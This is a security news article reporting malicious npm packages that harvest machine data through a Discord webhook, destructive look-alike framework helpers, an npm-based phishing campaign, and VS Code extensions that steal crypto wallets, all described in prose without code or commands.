Threat actors have published over 60 malicious npm packages that harvest hostnames, IP addresses, and user directories to a Discord-controlled endpoint. The packages were discovered by security researchers Kirill Boychenko and Kush Pandya, who revealed the malicious functionality in a report last week.
The affected packages were installed over 3,000 times and include basic sandbox-evasion checks, making every infected workstation or continuous-integration node a potential source of valuable reconnaissance. The malicious code is designed to fingerprint every machine that installs the package, while also aborting execution if it detects running in a virtualized environment associated with Amazon, Google, and others.
The harvested information is then transmitted to a Discord webhook, enabling threat actors to chart the network and identify high-value targets for future campaigns. This is not an isolated incident, as another set of eight npm packages was discovered masquerading as helper libraries for widely-used JavaScript frameworks, deploying destructive payloads once installed.
Security researchers warned that some of the identified packages execute automatically once developers invoke them in their projects, enabling recursive deletion of files related to Vue.js, React, and Vite. Others are designed to corrupt fundamental JavaScript methods or tamper with browser storage mechanisms like localStorage, sessionStorage, and cookies.
The activity has been traced to a threat actor named xuxingfeng, who also published five legitimate packages that work as intended. However, the threat actor’s approach of releasing both harmful and helpful packages creates a facade of legitimacy, making malicious packages more likely to be trusted and installed.
Furthermore, researchers discovered a novel attack campaign that combines traditional email phishing with JavaScript code from a malicious npm package disguised as a benign open-source library. The phishing attack demonstrates a high level of sophistication, using technologies like AES encryption, npm packages delivered through a CDN, and multiple redirections to mask malicious intentions.
Additionally, Datadog Security Research uncovered three malicious VS Code extensions that were engineered to siphon cryptocurrency wallet credentials by targeting Solidity developers on Windows. The extensions disguise themselves as legitimate, concealing harmful code within genuine features, and use command and control domains that appear relevant to Solidity.
The threat actor behind the VS Code extension is tracked as MUT-9332, who has also published a recently disclosed campaign involving 10 malicious VS Code extensions to install an XMRig cryptominer. This demonstrates the surprising lengths to which MUT-9332 will go to conceal their malicious intentions, and suggests that subsequent campaigns may be even more creative in their approach.
Source: https://thehackernews.com/2025/05/over-70-malicious-npm-and-vs-code.html